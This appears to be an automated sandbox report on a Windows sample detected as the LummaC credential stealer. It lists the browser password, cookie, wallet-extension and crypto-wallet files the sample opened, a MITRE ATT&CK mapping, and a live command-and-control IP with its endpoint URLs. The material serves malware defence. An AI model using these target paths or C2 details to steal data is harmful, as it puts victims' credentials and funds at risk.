Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match

File source: Process Memory Space: I5jG2Os8GA.exe PID: 7276, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 0.3.I5jG2Os8GA.exe.4280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.I5jG2Os8GA.exe.4280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.I5jG2Os8GA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.I5jG2Os8GA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: I5jG2Os8GA.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Native API	1 LSASS Driver	1 Process Injection	32 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 LSASS Driver	1 Process Injection	LSASS Memory	471 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	32 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	113 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
I5jG2Os8GA.exe	89%	ReversingLabs	Win32.Trojan.Smokeloader
I5jG2Os8GA.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://94.158.244.69/ZD8C	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sockv	0%	Avira URL Cloud	safe
http://94.158.244.69/ZKAf	0%	Avira URL Cloud	safe
http://94.158.244.69/xjsh	0%	Avira URL Cloud	safe
http://94.158.244.69/c2socks	0%	Avira URL Cloud	safe
http://94.158.244.69/SO	0%	Avira URL Cloud	safe
http://94.158.244.69/l0FL	0%	Avira URL Cloud	safe
http://94.158.244.69/O4ze	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sock5	0%	Avira URL Cloud	safe
http://94.158.244.69/9dokr	0%	Avira URL Cloud	safe
http://94.158.244.69/0WJ9	0%	Avira URL Cloud	safe
http://94.158.244.69/c2socks0	0%	Avira URL Cloud	safe
http://94.158.244.69/t8EB	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sockP	0%	Avira URL Cloud	safe
http://94.158.244.69/Xl2v	0%	Avira URL Cloud	safe
http://94.158.244.69/c2sockb	0%	Avira URL Cloud	safe
http://94.158.244.69/rF5X	0%	Avira URL Cloud	safe
http://94.158.244.69/iU89	0%	Avira URL Cloud	safe
http://94.158.244.69/xQclE	0%	Avira URL Cloud	safe
http://94.158.244.69/j3Rh	0%	Avira URL Cloud	safe
http://94.158.244.69/e/IR	0%	Avira URL Cloud	safe
http://94.158.244.69/qSC2	0%	Avira URL Cloud	safe
http://94.158.244.69/rD3S	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://94.158.244.69/c2sock	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.158.244.69/xjsh	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/c2sockv	I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/c2sock5	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/ZD8C	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/c2socks	I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/ZKAf	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/9dokr	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/l0FL	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/SO	I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/O4ze	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/0WJ9	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.14.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/c2socks0	I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/Xl2v	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/j3Rh	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/c2sockP	I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/xQclE	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/t8EB	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/	I5jG2Os8GA.exe, 00000000.00000002.3060914805.000000000566B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/rF5X	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/c2sockb	I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/iU89	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/e/IR	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://94.158.244.69/qSC2	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.158.244.69/rD3S	I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.158.244.69	unknown	Moldova Republic of		39798	MIVOCLOUDMD	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555045
Start date and time:	2024-11-13 10:52:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	I5jG2Os8GA.exe renamed because original name is a hash value
Original Sample Name:	1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 59 Number of non-executed functions: 80
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: I5jG2Os8GA.exe

Simulations

Behavior and APIs

Time	Type	Description
04:56:31	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.158.244.69	OlZzqwjrwO.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	Vd3tOP5WSD.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	g1kWKm20Z5.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	cgln32y2HF.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	4Oq9i3gm0g.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	RX7nieXlNm.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	5M5e9srxkE.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	dV01QsYySM.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	BeO2C8S5Ly.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock
	ToNaCrWjm7.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69/c2sock

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MIVOCLOUDMD	OlZzqwjrwO.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	Vd3tOP5WSD.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	g1kWKm20Z5.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	cgln32y2HF.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	4Oq9i3gm0g.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	RX7nieXlNm.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	5M5e9srxkE.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	dV01QsYySM.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	BeO2C8S5Ly.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69
	ToNaCrWjm7.exe	Get hash	malicious	LummaC Stealer	Browse	94.158.244.69

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_I5jG2Os8GA.exe_f92922c667fcc49ff5938083b97b3fee491ea0da_44de383f_e5452863-eeb7-4e67-8969-f221caec383b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8419194117709884
Encrypted:	false
SSDEEP:	96:UBLec+TOslWhclM7Zf/QXIDcQhc6hcEKcw3J++HbHg/8BRTf3Oy1EoqzIPTrXNf9:UteHTOMZ50/lA9PjudzuiF8Z24IO8Q7
MD5:	A3F8DB118EE11D68176FFBABEF207557
SHA1:	050E41D44613D77444E2ED6F7F2E78241E723EC9
SHA-256:	60DC9FF7A187E2FBF34DCF1B37F233051257C4FC44E59E4DF4D02406E410777E
SHA-512:	27C7A018250403B711B21573633BFE13BF11429E6B2207C8FF35C1EE036F8AC9BEC344322CEED8C32ADF12276DE06D39F5267970D94EACA6BD84EAE2BFF4C57E
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.3.8.6.8.4.5.2.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.3.8.7.2.2.0.2.5.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.4.5.2.8.6.3.-.e.e.b.7.-.4.e.6.7.-.8.9.6.9.-.f.2.2.1.c.a.e.c.3.8.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.0.a.5.7.f.e.-.3.e.b.9.-.4.b.b.d.-.8.2.6.a.-.a.9.0.6.3.5.b.c.f.8.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.5.j.G.2.O.s.8.G.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.c.-.0.0.0.1.-.0.0.1.3.-.1.5.8.4.-.4.f.e.6.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.a.c.0.b.9.c.4.e.7.9.e.2.b.c.f.9.e.5.b.c.c.c.8.4.c.4.c.d.b.c.b.0.0.0.0.f.f.f.f.!.0.0.0.0.6.b.9.f.2.b.f.9.8.2.e.0.7.1.b.f.d.9.b.4.b.3.7.1.e.5.8.1.9.9.3.e.d.3.e.f.8.a.7.c.!.I.5.j.G.2.O.s.8.G.A...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69C3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Nov 13 09:56:26 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	45420
Entropy (8bit):	2.6033013992258436
Encrypted:	false
SSDEEP:	192:BqC930XdBNuOY1gOqYC+uFHnqN4jg+BN+jpL9ZtMB26HuxXwcH:wtBsn13qYQVNg+BwnZtXScbH
MD5:	5A69E2632B4C3BBFA623FA146A139227
